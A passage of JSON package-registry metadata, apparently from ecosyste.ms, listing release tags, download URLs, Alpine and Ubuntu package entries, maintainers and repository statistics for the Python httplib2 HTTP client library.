ts"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T11:41:27.898Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":11.740062839758615,"forks_count":7.1068774624707,"docker_downloads_count":null,"average":4.711735075557328},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":280,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-05-23T07:13:01.111Z","updated_at":"2023-05-23T07:13:01.111Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3639,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1238},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-08-22T05:06:15.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":13381327,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-05T07:20:49.820Z","latest_release_published_at":"2026-02-05T07:20:49.820Z","latest_release_number":"0.20.4-3","last_synced_at":"2026-08-11T23:06:28.329Z","created_at":"2026-02-05T07:20:49.512Z","updated_at":"2026-08-25T00:50:05.059Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packagi